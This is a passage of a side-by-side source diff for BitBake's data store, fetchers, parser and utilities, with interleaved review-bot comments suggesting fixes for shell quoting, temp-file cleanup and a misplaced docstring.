408 if s == olds: 408 if s == olds:
409 break 409 break
@@ -411,6 +411,8 @@ class DataSmart(MutableMapping):
411 raise 411 raise
412 except bb.parse.SkipRecipe: 412 except bb.parse.SkipRecipe:
413 raise 413 raise
414 except bb.BBHandledException:
415 raise
414 except Exception as exc: 416 except Exception as exc:
415 tb = sys.exc_info()[2] 417 tb = sys.exc_info()[2]
416 raise ExpansionError(varname, s, exc).with_traceback(tb) from exc 418 raise ExpansionError(varname, s, exc).with_traceback(tb) from exc
@@ -481,6 +483,7 @@ class DataSmart(MutableMapping):
481 483
482 def setVar(self, var, value, **loginfo): 484 def setVar(self, var, value, **loginfo):
483 #print("var=" + str(var) + " val=" + str(value)) 485 #print("var=" + str(var) + " val=" + str(value))
486 var = var.replace(":", "_")
484 self.expand_cache = {} 487 self.expand_cache = {}
485 parsing=False 488 parsing=False
486 if 'parsing' in loginfo: 489 if 'parsing' in loginfo:
@@ -589,6 +592,8 @@ class DataSmart(MutableMapping):
589 """ 592 """
590 Rename the variable key to newkey 593 Rename the variable key to newkey
591 """ 594 """
595 key = key.replace(":", "_")
596 newkey = newkey.replace(":", "_")
592 if key == newkey: 597 if key == newkey:
593 bb.warn("Calling renameVar with equivalent keys (%s) is invalid" % key) 598 bb.warn("Calling renameVar with equivalent keys (%s) is invalid" % key)
594 return 599 return
@@ -637,6 +642,7 @@ class DataSmart(MutableMapping):
637 self.setVar(var + "_prepend", value, ignore=True, parsing=True) 642 self.setVar(var + "_prepend", value, ignore=True, parsing=True)
638 643
639 def delVar(self, var, **loginfo): 644 def delVar(self, var, **loginfo):
645 var = var.replace(":", "_")
640 self.expand_cache = {} 646 self.expand_cache = {}
641 647
642 loginfo['detail'] = "" 648 loginfo['detail'] = ""
@@ -664,6 +670,7 @@ class DataSmart(MutableMapping):
664 override = None 670 override = None
665 671
666 def setVarFlag(self, var, flag, value, **loginfo): 672 def setVarFlag(self, var, flag, value, **loginfo):
673 var = var.replace(":", "_")
667 self.expand_cache = {} 674 self.expand_cache = {}
668 675
669 if 'op' not in loginfo: 676 if 'op' not in loginfo:
@@ -687,6 +694,7 @@ class DataSmart(MutableMapping):
687 self.dict["__exportlist"]["_content"].add(var) 694 self.dict["__exportlist"]["_content"].add(var)
688 695
689 def getVarFlag(self, var, flag, expand=True, noweakdefault=False, parsing=False, retparser=False): 696 def getVarFlag(self, var, flag, expand=True, noweakdefault=False, parsing=False, retparser=False):
697 var = var.replace(":", "_")
690 if flag == "_content": 698 if flag == "_content":
691 cachename = var 699 cachename = var
692 else: 700 else:
@@ -814,6 +822,7 @@ class DataSmart(MutableMapping):
814 return value 822 return value
815 823
816 def delVarFlag(self, var, flag, **loginfo): 824 def delVarFlag(self, var, flag, **loginfo):
825 var = var.replace(":", "_")
817 self.expand_cache = {} 826 self.expand_cache = {}
818 827
819 local_var, _ = self._findVar(var) 828 local_var, _ = self._findVar(var)
@@ -831,6 +840,7 @@ class DataSmart(MutableMapping):
831 del self.dict[var][flag] 840 del self.dict[var][flag]
832 841
833 def appendVarFlag(self, var, flag, value, **loginfo): 842 def appendVarFlag(self, var, flag, value, **loginfo):
843 var = var.replace(":", "_")
834 loginfo['op'] = 'append' 844 loginfo['op'] = 'append'
835 loginfo['flag'] = flag 845 loginfo['flag'] = flag
836 self.varhistory.record(**loginfo) 846 self.varhistory.record(**loginfo)
@@ -838,6 +848,7 @@ class DataSmart(MutableMapping):
838 self.setVarFlag(var, flag, newvalue, ignore=True) 848 self.setVarFlag(var, flag, newvalue, ignore=True)
839 849
840 def prependVarFlag(self, var, flag, value, **loginfo): 850 def prependVarFlag(self, var, flag, value, **loginfo):
851 var = var.replace(":", "_")
841 loginfo['op'] = 'prepend' 852 loginfo['op'] = 'prepend'
842 loginfo['flag'] = flag 853 loginfo['flag'] = flag
843 self.varhistory.record(**loginfo) 854 self.varhistory.record(**loginfo)
@@ -845,6 +856,7 @@ class DataSmart(MutableMapping):
845 self.setVarFlag(var, flag, newvalue, ignore=True) 856 self.setVarFlag(var, flag, newvalue, ignore=True)
846 857
847 def setVarFlags(self, var, flags, **loginfo): 858 def setVarFlags(self, var, flags, **loginfo):
859 var = var.replace(":", "_")
848 self.expand_cache = {} 860 self.expand_cache = {}
849 infer_caller_details(loginfo) 861 infer_caller_details(loginfo)
850 if not var in self.dict: 862 if not var in self.dict:
@@ -859,6 +871,7 @@ class DataSmart(MutableMapping):
859 self.dict[var][i] = flags[i] 871 self.dict[var][i] = flags[i]
860 872
861 def getVarFlags(self, var, expand = False, internalflags=False): 873 def getVarFlags(self, var, expand = False, internalflags=False):
874 var = var.replace(":", "_")
862 local_var, _ = self._findVar(var) 875 local_var, _ = self._findVar(var)
863 flags = {} 876 flags = {}
864 877
@@ -875,6 +888,7 @@ class DataSmart(MutableMapping):
875 888
876 889
877 def delVarFlags(self, var, **loginfo): 890 def delVarFlags(self, var, **loginfo):
891 var = var.replace(":", "_")
878 self.expand_cache = {} 892 self.expand_cache = {}
879 if not var in self.dict: 893 if not var in self.dict:
880 self._makeShadowCopy(var) 894 self._makeShadowCopy(var)
diff --git a/bitbake/lib/bb/event.py b/bitbake/lib/bb/event.py
index d1359f0100..cb0b3b3345 100644
--- a/bitbake/lib/bb/event.py
+++ b/bitbake/lib/bb/event.py
@@ -10,17 +10,17 @@ BitBake build tools.
10# SPDX-License-Identifier: GPL-2.0-only 10# SPDX-License-Identifier: GPL-2.0-only
11# 11#
12 12
13import sys
14import pickle
15import logging
16import atexit
17import traceback
18import ast 13import ast
14import atexit
15import collections
16import logging
17import pickle
18import sys
19import threading 19import threading
20import traceback
20 21
21import bb.utils
22import bb.compat
23import bb.exceptions 22import bb.exceptions
23import bb.utils
24 24
25# This is the pid for which we should generate the event. This is set when 25# This is the pid for which we should generate the event. This is set when
26# the runqueue forks off. 26# the runqueue forks off.
@@ -56,7 +56,7 @@ def set_class_handlers(h):
56 _handlers = h 56 _handlers = h
57 57
58def clean_class_handlers(): 58def clean_class_handlers():
59 return bb.compat.OrderedDict() 59 return collections.OrderedDict()
60 60
61# Internal 61# Internal
62_handlers = clean_class_handlers() 62_handlers = clean_class_handlers()
diff --git a/bitbake/lib/bb/fetch2/__init__.py b/bitbake/lib/bb/fetch2/__init__.py
index dc99914cd9..3e6555bd67 100644
--- a/bitbake/lib/bb/fetch2/__init__.py
+++ b/bitbake/lib/bb/fetch2/__init__.py
@@ -562,6 +562,9 @@ def verify_checksum(ud, d, precomputed={}):
562 562
563 checksum_expected = getattr(ud, "%s_expected" % checksum_id) 563 checksum_expected = getattr(ud, "%s_expected" % checksum_id)
564 564
565 if checksum_expected == '':
566 checksum_expected = None
567
565 return { 568 return {
566 "id": checksum_id, 569 "id": checksum_id,
567 "name": checksum_name, 570 "name": checksum_name,
@@ -612,7 +615,7 @@ def verify_checksum(ud, d, precomputed={}):
612 615
613 for ci in checksum_infos: 616 for ci in checksum_infos:
614 if ci["expected"] and ci["expected"] != ci["data"]: 617 if ci["expected"] and ci["expected"] != ci["data"]:
615 messages.append("File: '%s' has %s checksum %s when %s was " \ 618 messages.append("File: '%s' has %s checksum '%s' when '%s' was " \
616 "expected" % (ud.localpath, ci["id"], ci["data"], ci["expected"])) 619 "expected" % (ud.localpath, ci["id"], ci["data"], ci["expected"]))
617 bad_checksum = ci["data"] 620 bad_checksum = ci["data"]
618 621
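Review bot: The `if checksum_expected == '':` normalisation at new lines 565-566 has no comment, and the reason matters for source integrity checking. The comparison loop in the second hunk already skips any falsy `expected`, so the visible effect of converting to `None` must come from code outside these hunks, presumably the path that decides what to do when no checksum was supplied. I would add `# An empty checksum value means "not supplied"; use None so it is handled exactly like a missing checksum` above the test, so nobody later removes it as redundant. Both hunks sit inside functions whose bodies start and end outside the hunk.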
diff --git a/bitbake/lib/bb/fetch2/git.py b/bitbake/lib/bb/fetch2/git.py
index 8740e9c05f..cad1ae8207 100644
--- a/bitbake/lib/bb/fetch2/git.py
+++ b/bitbake/lib/bb/fetch2/git.py
@@ -44,7 +44,8 @@ Supported SRC_URI options are:
44 44
45- nobranch 45- nobranch
46 Don't check the SHA validation for branch. set this option for the recipe 46 Don't check the SHA validation for branch. set this option for the recipe
47 referring to commit which is valid in tag instead of branch. 47 referring to commit which is valid in any namespace (branch, tag, ...)
48 instead of branch.
48 The default is "0", set nobranch=1 if needed. 49 The default is "0", set nobranch=1 if needed.
49 50
50- usehead 51- usehead
@@ -63,10 +64,12 @@ import errno
63import fnmatch 64import fnmatch
64import os 65import os
65import re 66import re
67import shlex
66import subprocess 68import subprocess
67import tempfile 69import tempfile
68import bb 70import bb
69import bb.progress 71import bb.progress
72from contextlib import contextmanager
70from bb.fetch2 import FetchMethod 73from bb.fetch2 import FetchMethod
71from bb.fetch2 import runfetchcmd 74from bb.fetch2 import runfetchcmd
72from bb.fetch2 import logger 75from bb.fetch2 import logger
@@ -140,6 +143,10 @@ class Git(FetchMethod):
140 ud.proto = 'file' 143 ud.proto = 'file'
141 else: 144 else:
142 ud.proto = "git" 145 ud.proto = "git"
146 if ud.host == "github.com" and ud.proto == "git":
147 # github stopped supporting git protocol
148 # https://github.blog/2021-09-01-improving-git-protocol-security-github/#no-more-unauthenticated-git
149 ud.proto = "https"
143 150
144 if not ud.proto in ('git', 'file', 'ssh', 'http', 'https', 'rsync'): 151 if not ud.proto in ('git', 'file', 'ssh', 'http', 'https', 'rsync'):
145 raise bb.fetch2.ParameterError("Invalid protocol type", ud.url) 152 raise bb.fetch2.ParameterError("Invalid protocol type", ud.url)
@@ -219,7 +226,12 @@ class Git(FetchMethod):
219 ud.shallow = False 226 ud.shallow = False
220 227
221 if ud.usehead: 228 if ud.usehead:
222 ud.unresolvedrev['default'] = 'HEAD' 229 # When usehead is set let's associate 'HEAD' with the unresolved
230 # rev of this repository. This will get resolved into a revision
231 # later. If an actual revision happens to have also been provided
232 # then this setting will be overridden.
233 for name in ud.names:
234 ud.unresolvedrev[name] = 'HEAD'
223 235
224 ud.basecmd = d.getVar("FETCHCMD_git") or "git -c core.fsyncobjectfiles=0" 236 ud.basecmd = d.getVar("FETCHCMD_git") or "git -c core.fsyncobjectfiles=0"
225 237
@@ -342,7 +354,7 @@ class Git(FetchMethod):
342 # We do this since git will use a "-l" option automatically for local urls where possible 354 # We do this since git will use a "-l" option automatically for local urls where possible
343 if repourl.startswith("file://"): 355 if repourl.startswith("file://"):
344 repourl = repourl[7:] 356 repourl = repourl[7:]
345 clone_cmd = "LANG=C %s clone --bare --mirror \"%s\" %s --progress" % (ud.basecmd, repourl, ud.clonedir) 357 clone_cmd = "LANG=C %s clone --bare --mirror %s %s --progress" % (ud.basecmd, shlex.quote(repourl), ud.clonedir)
346 if ud.proto.lower() != 'file': 358 if ud.proto.lower() != 'file':
347 bb.fetch2.check_network_access(d, clone_cmd, ud.url) 359 bb.fetch2.check_network_access(d, clone_cmd, ud.url)
348 progresshandler = GitProgressHandler(d) 360 progresshandler = GitProgressHandler(d)
@@ -354,8 +366,12 @@ class Git(FetchMethod):
354 if "origin" in output: 366 if "origin" in output:
355 runfetchcmd("%s remote rm origin" % ud.basecmd, d, workdir=ud.clonedir) 367 runfetchcmd("%s remote rm origin" % ud.basecmd, d, workdir=ud.clonedir)
356 368
357 runfetchcmd("%s remote add --mirror=fetch origin \"%s\"" % (ud.basecmd, repourl), d, workdir=ud.clonedir) 369 runfetchcmd("%s remote add --mirror=fetch origin %s" % (ud.basecmd, shlex.quote(repourl)), d, workdir=ud.clonedir)
358 fetch_cmd = "LANG=C %s fetch -f --progress \"%s\" refs/*:refs/*" % (ud.basecmd, repourl) 370
371 if ud.nobranch:
372 fetch_cmd = "LANG=C %s fetch -f --progress %s refs/*:refs/*" % (ud.basecmd, shlex.quote(repourl))
373 else:
374 fetch_cmd = "LANG=C %s fetch -f --progress %s refs/heads/*:refs/heads/* refs/tags/*:refs/tags/*" % (ud.basecmd, shlex.quote(repourl))
359 if ud.proto.lower() != 'file': 375 if ud.proto.lower() != 'file':
360 bb.fetch2.check_network_access(d, fetch_cmd, ud.url) 376 bb.fetch2.check_network_access(d, fetch_cmd, ud.url)
361 progresshandler = GitProgressHandler(d) 377 progresshandler = GitProgressHandler(d)
@@ -388,7 +404,7 @@ class Git(FetchMethod):
388 tmpdir = tempfile.mkdtemp(dir=d.getVar('DL_DIR')) 404 tmpdir = tempfile.mkdtemp(dir=d.getVar('DL_DIR'))
389 try: 405 try:
390 # Do the checkout. This implicitly involves a Git LFS fetch. 406 # Do the checkout. This implicitly involves a Git LFS fetch.
391 self.unpack(ud, tmpdir, d) 407 Git.unpack(self, ud, tmpdir, d)
392 408
393 # Scoop up a copy of any stuff that Git LFS downloaded. Merge them into 409 # Scoop up a copy of any stuff that Git LFS downloaded. Merge them into
394 # the bare clonedir. 410 # the bare clonedir.
@@ -408,6 +424,20 @@ class Git(FetchMethod):
408 bb.utils.remove(tmpdir, recurse=True) 424 bb.utils.remove(tmpdir, recurse=True)
409 425
410 def build_mirror_data(self, ud, d): 426 def build_mirror_data(self, ud, d):
427
428 # Create as a temp file and move atomically into position to avoid races
429 @contextmanager
430 def create_atomic(filename):
431 fd, tfile = tempfile.mkstemp(dir=os.path.dirname(filename))
432 try:
433 yield tfile
434 umask = os.umask(0o666)
435 os.umask(umask)
436 os.chmod(tfile, (0o666 & ~umask))
437 os.rename(tfile, filename)
438 finally:
439 os.close(fd)
440
411 if ud.shallow and ud.write_shallow_tarballs: 441 if ud.shallow and ud.write_shallow_tarballs:
412 if not os.path.exists(ud.fullshallow): 442 if not os.path.exists(ud.fullshallow):
413 if os.path.islink(ud.fullshallow): 443 if os.path.islink(ud.fullshallow):
@@ -418,7 +448,8 @@ class Git(FetchMethod):
418 self.clone_shallow_local(ud, shallowclone, d) 448 self.clone_shallow_local(ud, shallowclone, d)
419 449
420 logger.info("Creating tarball of git repository") 450 logger.info("Creating tarball of git repository")
421 runfetchcmd("tar -czf %s ." % ud.fullshallow, d, workdir=shallowclone) 451 with create_atomic(ud.fullshallow) as tfile:
452 runfetchcmd("tar -czf %s ." % tfile, d, workdir=shallowclone)
422 runfetchcmd("touch %s.done" % ud.fullshallow, d) 453 runfetchcmd("touch %s.done" % ud.fullshallow, d)
423 finally: 454 finally:
424 bb.utils.remove(tempdir, recurse=True) 455 bb.utils.remove(tempdir, recurse=True)
@@ -427,7 +458,8 @@ class Git(FetchMethod):
427 os.unlink(ud.fullmirror) 458 os.unlink(ud.fullmirror)
428 459
429 logger.info("Creating tarball of git repository") 460 logger.info("Creating tarball of git repository")
430 runfetchcmd("tar -czf %s ." % ud.fullmirror, d, workdir=ud.clonedir) 461 with create_atomic(ud.fullmirror) as tfile:
462 runfetchcmd("tar -czf %s ." % tfile, d, workdir=ud.clonedir)
431 runfetchcmd("touch %s.done" % ud.fullmirror, d) 463 runfetchcmd("touch %s.done" % ud.fullmirror, d)
432 464
433 def clone_shallow_local(self, ud, dest, d): 465 def clone_shallow_local(self, ud, dest, d):
@@ -533,7 +565,7 @@ class Git(FetchMethod):
533 raise bb.fetch2.UnpackError("No up to date source found: " + "; ".join(source_error), ud.url) 565 raise bb.fetch2.UnpackError("No up to date source found: " + "; ".join(source_error), ud.url)
534 566
535 repourl = self._get_repo_url(ud) 567 repourl = self._get_repo_url(ud)
536 runfetchcmd("%s remote set-url origin \"%s\"" % (ud.basecmd, repourl), d, workdir=destdir) 568 runfetchcmd("%s remote set-url origin %s" % (ud.basecmd, shlex.quote(repourl)), d, workdir=destdir)
537 569
538 if self._contains_lfs(ud, d, destdir): 570 if self._contains_lfs(ud, d, destdir):
539 if need_lfs and not self._find_git_lfs(d): 571 if need_lfs and not self._find_git_lfs(d):
@@ -661,8 +693,8 @@ class Git(FetchMethod):
661 d.setVar('_BB_GIT_IN_LSREMOTE', '1') 693 d.setVar('_BB_GIT_IN_LSREMOTE', '1')
662 try: 694 try:
663 repourl = self._get_repo_url(ud) 695 repourl = self._get_repo_url(ud)
664 cmd = "%s ls-remote \"%s\" %s" % \ 696 cmd = "%s ls-remote %s %s" % \
665 (ud.basecmd, repourl, search) 697 (ud.basecmd, shlex.quote(repourl), search)
666 if ud.proto.lower() != 'file': 698 if ud.proto.lower() != 'file':
667 bb.fetch2.check_network_access(d, cmd, repourl) 699 bb.fetch2.check_network_access(d, cmd, repourl)
668 output = runfetchcmd(cmd, d, True) 700 output = runfetchcmd(cmd, d, True)
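Review bot: `create_atomic` in `build_mirror_data` (new lines 429-439) leaves the `mkstemp` file behind when the `with` body raises, because the `finally` branch only closes `fd`. Every failed `tar` therefore leaves a stray temp file next to the mirror tarballs. An `except BaseException:` branch ahead of the `finally`, containing `bb.utils.remove(tfile)` and then `raise`, would clean up. The two `tar -czf %s .` calls at new lines 452 and 462 also interpolate `tfile` unquoted, although this commit moves `repourl` to `shlex.quote`; `shlex.quote(tfile)` would keep the command strings consistent, and `ud.clonedir` in `clone_cmd` at new line 357 is in the same position. `build_mirror_data` continues outside the hunk.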
diff --git a/bitbake/lib/bb/fetch2/wget.py b/bitbake/lib/bb/fetch2/wget.py
index f7d1de26b7..368c644337 100644
--- a/bitbake/lib/bb/fetch2/wget.py
+++ b/bitbake/lib/bb/fetch2/wget.py
@@ -52,6 +52,12 @@ class WgetProgressHandler(bb.progress.LineFilterProgressHandler):
52 52
53 53
54class Wget(FetchMethod): 54class Wget(FetchMethod):
55
56 # CDNs like CloudFlare may do a 'browser integrity test' which can fail
57 # with the standard wget/urllib User-Agent, so pretend to be a modern
58 # browser.
59 user_agent = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0"
60
55 """Class to fetch urls via 'wget'""" 61 """Class to fetch urls via 'wget'"""
56 def supports(self, ud, d): 62 def supports(self, ud, d):
57 """ 63 """
@@ -91,10 +97,9 @@ class Wget(FetchMethod):
91 97
92 fetchcmd = self.basecmd 98 fetchcmd = self.basecmd
93 99
94 if 'downloadfilename' in ud.parm: 100 localpath = os.path.join(d.getVar("DL_DIR"), ud.localfile) + ".tmp"
95 localpath = os.path.join(d.getVar("DL_DIR"), ud.localfile) 101 bb.utils.mkdirhier(os.path.dirname(localpath))
96 bb.utils.mkdirhier(os.path.dirname(localpath)) 102 fetchcmd += " -O %s" % shlex.quote(localpath)
97 fetchcmd += " -O %s" % shlex.quote(localpath)
98 103
99 if ud.user and ud.pswd: 104 if ud.user and ud.pswd:
100 fetchcmd += " --user=%s --password=%s --auth-no-challenge" % (ud.user, ud.pswd) 105 fetchcmd += " --user=%s --password=%s --auth-no-challenge" % (ud.user, ud.pswd)
@@ -108,6 +113,10 @@ class Wget(FetchMethod):
108 113
109 self._runwget(ud, d, fetchcmd, False) 114 self._runwget(ud, d, fetchcmd, False)
110 115
116 # Remove the ".tmp" and move the file into position atomically
117 # Our lock prevents multiple writers but mirroring code may grab incomplete files
118 os.rename(localpath, localpath[:-4])
119
111 # Sanity check since wget can pretend it succeed when it didn't 120 # Sanity check since wget can pretend it succeed when it didn't
112 # Also, this used to happen if sourceforge sent us to the mirror page 121 # Also, this used to happen if sourceforge sent us to the mirror page
113 if not os.path.exists(ud.localpath): 122 if not os.path.exists(ud.localpath):
@@ -300,7 +309,7 @@ class Wget(FetchMethod):
300 # Some servers (FusionForge, as used on Alioth) require that the 309 # Some servers (FusionForge, as used on Alioth) require that the
301 # optional Accept header is set. 310 # optional Accept header is set.
302 r.add_header("Accept", "*/*") 311 r.add_header("Accept", "*/*")
303 r.add_header("User-Agent", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/9.10 (karmic) Firefox/3.6.12") 312 r.add_header("User-Agent", self.user_agent)
304 def add_basic_auth(login_str, request): 313 def add_basic_auth(login_str, request):
305 '''Adds Basic auth to http request, pass in login:password as string''' 314 '''Adds Basic auth to http request, pass in login:password as string'''
306 import base64 315 import base64
@@ -319,7 +328,7 @@ class Wget(FetchMethod):
319 except (TypeError, ImportError, IOError, netrc.NetrcParseError): 328 except (TypeError, ImportError, IOError, netrc.NetrcParseError):
320 pass 329 pass
321 330
322 with opener.open(r) as response: 331 with opener.open(r, timeout=30) as response:
323 pass 332 pass
324 except urllib.error.URLError as e: 333 except urllib.error.URLError as e:
325 if try_again: 334 if try_again:
@@ -404,9 +413,8 @@ class Wget(FetchMethod):
404 """ 413 """
405 f = tempfile.NamedTemporaryFile() 414 f = tempfile.NamedTemporaryFile()
406 with tempfile.TemporaryDirectory(prefix="wget-index-") as workdir, tempfile.NamedTemporaryFile(dir=workdir, prefix="wget-listing-") as f: 415 with tempfile.TemporaryDirectory(prefix="wget-index-") as workdir, tempfile.NamedTemporaryFile(dir=workdir, prefix="wget-listing-") as f:
407 agent = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/9.10 (karmic) Firefox/3.6.12"
408 fetchcmd = self.basecmd 416 fetchcmd = self.basecmd
409 fetchcmd += " -O " + f.name + " --user-agent='" + agent + "' '" + uri + "'" 417 fetchcmd += " -O " + f.name + " --user-agent='" + self.user_agent + "' '" + uri + "'"
410 try: 418 try:
411 self._runwget(ud, d, fetchcmd, True, workdir=workdir) 419 self._runwget(ud, d, fetchcmd, True, workdir=workdir)
412 fetchresult = f.read() 420 fetchresult = f.read()
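Review bot: The listing command at new line 417 still wraps `uri` and the user agent in hand-written single quotes, so a URL containing `'` ends the quoting and the rest is interpreted by whatever shell `_runwget` passes the string to (its body is outside the hunk, so that part is inferred). The line is being touched anyway and the download hunk already uses `shlex.quote(localpath)`, so build it as `fetchcmd += " -O %s --user-agent=%s %s" % (shlex.quote(f.name), shlex.quote(self.user_agent), shlex.quote(uri))`. Separately, the `user_agent` attribute at new lines 55-61 now sits above `"""Class to fetch urls via 'wget'"""`, so that string is no longer the class docstring; moving the attribute below it restores the docstring.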
diff --git a/bitbake/lib/bb/monitordisk.py b/bitbake/lib/bb/monitordisk.py
index e7c07264a8..4d243af30b 100644
--- a/bitbake/lib/bb/monitordisk.py
+++ b/bitbake/lib/bb/monitordisk.py
@@ -229,9 +229,10 @@ class diskMonitor:
229 freeInode = st.f_favail 229 freeInode = st.f_favail
230 230
231 if minInode and freeInode < minInode: 231 if minInode and freeInode < minInode:
232 # Some filesystems use dynamic inodes so can't run out 232 # Some filesystems use dynamic inodes so can't run out.
233 # (e.g. btrfs). This is reported by the inode count being 0. 233 # This is reported by the inode count being 0 (btrfs) or the free
234 if st.f_files == 0: 234 # inode count being -1 (cephfs).
235 if st.f_files == 0 or st.f_favail == -1:
235 self.devDict[k][2] = None 236 self.devDict[k][2] = None
236 continue 237 continue
237 # Always show warning, the self.checked would always be False if the action is WARN 238 # Always show warning, the self.checked would always be False if the action is WARN
diff --git a/bitbake/lib/bb/msg.py b/bitbake/lib/bb/msg.py
index 2d88c4e72d..1b1a23bb50 100644
--- a/bitbake/lib/bb/msg.py
+++ b/bitbake/lib/bb/msg.py
@@ -146,18 +146,12 @@ class LogFilterLTLevel(logging.Filter):
146# 146#
147 147
148loggerDefaultLogLevel = BBLogFormatter.NOTE 148loggerDefaultLogLevel = BBLogFormatter.NOTE
149loggerDefaultVerbose = False
150loggerVerboseLogs = False
151loggerDefaultDomains = {} 149loggerDefaultDomains = {}
152 150
153def init_msgconfig(verbose, debug, debug_domains=None): 151def init_msgconfig(verbose, debug, debug_domains=None):
154 """ 152 """
155 Set default verbosity and debug levels config the logger 153 Set default verbosity and debug levels config the logger
156 """ 154 """
157 bb.msg.loggerDefaultVerbose = verbose
158 if verbose:
159 bb.msg.loggerVerboseLogs = True
160
161 if debug: 155 if debug:
162 bb.msg.loggerDefaultLogLevel = BBLogFormatter.DEBUG - debug + 1 156 bb.msg.loggerDefaultLogLevel = BBLogFormatter.DEBUG - debug + 1
163 elif verbose: 157 elif verbose:
diff --git a/bitbake/lib/bb/parse/ast.py b/bitbake/lib/bb/parse/ast.py
index eb8cfa21b8..9f46f3f35a 100644
--- a/bitbake/lib/bb/parse/ast.py
+++ b/bitbake/lib/bb/parse/ast.py
@@ -97,6 +97,7 @@ class DataNode(AstNode):
97 def eval(self, data): 97 def eval(self, data):
98 groupd = self.groupd 98 groupd = self.groupd
99 key = groupd["var"] 99 key = groupd["var"]
100 key = key.replace(":", "_")
100 loginfo = { 101 loginfo = {
101 'variable': key, 102 'variable': key,
102 'file': self.filename, 103 'file': self.filename,
@@ -207,6 +208,7 @@ class ExportFuncsNode(AstNode):
207 def eval(self, data): 208 def eval(self, data):
208 209
209 for func in self.n: 210 for func in self.n:
211 func = func.replace(":", "_")
210 calledfunc = self.classname + "_" + func 212 calledfunc = self.classname + "_" + func
211 213
212 if data.getVar(func, False) and not data.getVarFlag(func, 'export_func', False): 214 if data.getVar(func, False) and not data.getVarFlag(func, 'export_func', False):
diff --git a/bitbake/lib/bb/parse/parse_py/BBHandler.py b/bitbake/lib/bb/parse/parse_py/BBHandler.py
index 6e216effb8..8781129fc1 100644
--- a/bitbake/lib/bb/parse/parse_py/BBHandler.py
+++ b/bitbake/lib/bb/parse/parse_py/BBHandler.py
@@ -22,7 +22,7 @@ from .ConfHandler import include, init
22# For compatibility 22# For compatibility
23bb.deprecate_import(__name__, "bb.parse", ["vars_from_file"]) 23bb.deprecate_import(__name__, "bb.parse", ["vars_from_file"])
24 24
25__func_start_regexp__ = re.compile(r"(((?P<py>python)|(?P<fr>fakeroot))\s*)*(?P<func>[\w\.\-\+\{\}\$]+)?\s*\(\s*\)\s*{$" ) 25__func_start_regexp__ = re.compile(r"(((?P<py>python(?=(\s|\()))|(?P<fr>fakeroot(?=\s)))\s*)*(?P<func>[\w\.\-\+\{\}\$:]+)?\s*\(\s*\)\s*{$" )
26__inherit_regexp__ = re.compile(r"inherit\s+(.+)" ) 26__inherit_regexp__ = re.compile(r"inherit\s+(.+)" )
27__export_func_regexp__ = re.compile(r"EXPORT_FUNCTIONS\s+(.+)" ) 27__export_func_regexp__ = re.compile(r"EXPORT_FUNCTIONS\s+(.+)" )
28__addtask_regexp__ = re.compile(r"addtask\s+(?P<func>\w+)\s*((before\s*(?P<before>((.*(?=after))|(.*))))|(after\s*(?P<after>((.*(?=before))|(.*)))))*") 28__addtask_regexp__ = re.compile(r"addtask\s+(?P<func>\w+)\s*((before\s*(?P<before>((.*(?=after))|(.*))))|(after\s*(?P<after>((.*(?=before))|(.*)))))*")
diff --git a/bitbake/lib/bb/parse/parse_py/ConfHandler.py b/bitbake/lib/bb/parse/parse_py/ConfHandler.py
index af64d3446e..a7e81bd6ad 100644
--- a/bitbake/lib/bb/parse/parse_py/ConfHandler.py
+++ b/bitbake/lib/bb/parse/parse_py/ConfHandler.py
@@ -20,7 +20,7 @@ from bb.parse import ParseError, resolve_file, ast, logger, handle
20__config_regexp__ = re.compile( r""" 20__config_regexp__ = re.compile( r"""
21 ^ 21 ^
22 (?P<exp>export\s+)? 22 (?P<exp>export\s+)?
23 (?P<var>[a-zA-Z0-9\-_+.${}/~]+?) 23 (?P<var>[a-zA-Z0-9\-_+.${}/~:]+?)
24 (\[(?P<flag>[a-zA-Z0-9\-_+.]+)\])? 24 (\[(?P<flag>[a-zA-Z0-9\-_+.]+)\])?
25 25
26 \s* ( 26 \s* (
diff --git a/bitbake/lib/bb/persist_data.py b/bitbake/lib/bb/persist_data.py
index 7357ab2d44..56c983f816 100644
--- a/bitbake/lib/bb/persist_data.py
+++ b/bitbake/lib/bb/persist_data.py
@@ -12,14 +12,15 @@ currently, providing a key/value store accessed by 'domain'.
12# 12#
13 13
14import collections 14import collections
15import collections.abc
16import contextlib
17import functools
15import logging 18import logging
16import os.path 19import os.path
20import sqlite3
17import sys 21import sys
18import warnings 22import warnings
19from bb.compat import total_ordering 23from collections.abc import Mapping
20from collections import Mapping
21import sqlite3
22import contextlib
23 24
24sqlversion = sqlite3.sqlite_version_info 25sqlversion = sqlite3.sqlite_version_info
25if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3): 26if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3):
@@ -28,8 +29,8 @@ if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3):
28 29
29logger = logging.getLogger("BitBake.PersistData") 30logger = logging.getLogger("BitBake.PersistData")
30 31
31@total_ordering 32@functools.total_ordering
32class SQLTable(collections.MutableMapping): 33class SQLTable(collections.abc.MutableMapping):
33 class _Decorators(object): 34 class _Decorators(object):
34 @staticmethod 35 @staticmethod
35 def retry(*, reconnect=True): 36 def retry(*, reconnect=True):
diff --git a/bitbake/lib/bb/process.py b/bitbake/lib/bb/process.py
index 2dc472a86f..24c588e533 100644
--- a/bitbake/lib/bb/process.py
+++ b/bitbake/lib/bb/process.py
@@ -179,5 +179,8 @@ def run(cmd, input=None, log=None, extrafiles=None, **options):
179 stderr = stderr.decode("utf-8") 179 stderr = stderr.decode("utf-8")
180 180
181 if pipe.returncode != 0: 181 if pipe.returncode != 0:
182 if log:
183 # Don't duplicate the output in the exception if logging it
184 raise ExecutionError(cmd, pipe.returncode, None, None)
182 raise ExecutionError(cmd, pipe.returncode, stdout, stderr) 185 raise ExecutionError(cmd, pipe.returncode, stdout, stderr)
183 return stdout, stderr 186 return stdout, stderr
diff --git a/bitbake/lib/bb/providers.py b/bitbake/lib/bb/providers.py
index 81459c36d5..484e1ea4f3 100644
--- a/bitbake/lib/bb/providers.py
+++ b/bitbake/lib/bb/providers.py
@@ -151,7 +151,7 @@ def findPreferredProvider(pn, cfgData, dataCache, pkg_pn = None, item = None):
151 if item: 151 if item:
152 itemstr = " (for item %s)" % item 152 itemstr = " (for item %s)" % item
153 if preferred_file is None: 153 if preferred_file is None:
